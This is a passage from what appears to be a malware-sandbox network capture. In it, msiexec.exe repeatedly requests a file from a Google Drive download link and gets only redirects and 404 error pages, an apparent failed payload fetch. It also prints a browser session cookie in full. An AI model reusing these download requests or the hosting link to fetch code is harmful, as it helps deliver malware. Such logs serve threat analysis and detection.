                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:52 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 62 4b 49 6b 77 7a 4a 77 74 2d 38 6a 6b 51 31 58 6e 2d 63 4d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="3bKIkwzJwt-8jkQ1Xn-cMw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.9 | 49982 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:53 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:54 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:54 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-zkquMcfjZB5PpyvmXRRlGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.9 | 49983 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:54 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:55 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFiumC4FkAEpy9cpXTjGevKEliGRmQk6sLx2PvVkXuOonHF_NsHnSELMAjG2IEQdeq3mrv2A
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:55 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-ejR7Zf_6k2X81s4YVks1Bg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:55 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 62 6e 45 41 6d 51 79 52 68 4c 4f 6c 51 68 6f 42 67 65 51 4c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cbnEAmQyRhLOlQhoBgeQLg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.9 | 49984 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:56 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:56 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:56 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-skXHX4DevahrePO_Yys1Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.9 | 49985 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:57 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:57 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgS43oOuhh8VWKFSSsSK-VS4bQuLCawZpz7hbTmVjepChF9GpZzZ-FT1_ZGV61RnXNzJ
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:57 GMT
                                                          Content-Security-Policy: script-src 'nonce-RbIqqbL5A-sM2qw7ErJk9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:30:57 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 50 4e 36 42 31 75 46 52 68 59 63 55 41 69 42 67 55 5f 57 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4PN6B1uFRhYcUAiBgU_W8g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.9 | 49986 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:58 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:30:58 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:58 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-jm2DD_fLm-7wkm7ZOOBJDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.9 | 49987 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:59 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:00 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgRi-w3JwOID6ax-YpJ4pSxZDT_qA8ibee2LelrMfP5B3AItsVOVE2eQjQlXrcdvvaOCptnKKok
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:59 GMT
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: script-src 'nonce-eZqXO2lSHEIBW-PRKOYQvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:00 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 2d 74 5f 34 6a 37 55 33 45 66 6c 70 41 31 62 37 77 72 31 72 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="--t_4j7U3EflpA1b7wr1rw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.9 | 49988 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:00 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:01 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:01 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-YX3GTvVLUQeFFznO22NExA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.9 | 49989 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
